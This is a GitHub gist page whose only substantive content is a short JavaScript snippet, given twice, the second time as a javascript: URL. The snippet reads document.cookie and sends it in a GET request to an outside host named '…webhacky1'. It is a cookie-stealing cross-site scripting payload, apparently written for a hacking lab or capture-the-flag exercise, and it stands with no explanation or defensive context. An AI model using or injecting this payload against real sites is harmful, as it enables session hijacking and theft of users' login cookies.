Skip to content

Instantly share code, notes, and snippets.

@chrismatix
Last active January 13, 2018 15:44
Show Gist options
  • Save chrismatix/951517748d65adc494c64069b8c4bb61 to your computer and use it in GitHub Desktop.
Save chrismatix/951517748d65adc494c64069b8c4bb61 to your computer and use it in GitHub Desktop.
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://3afee2d6a486c1115d6bc370352fc37e.webhacky1/?c=" + document.cookie, true);
xhttp.send();
javascript:var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://3afee2d6a486c1115d6bc370352fc37e.webhacky1/?c=" + document.cookie, true);
xhttp.send();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment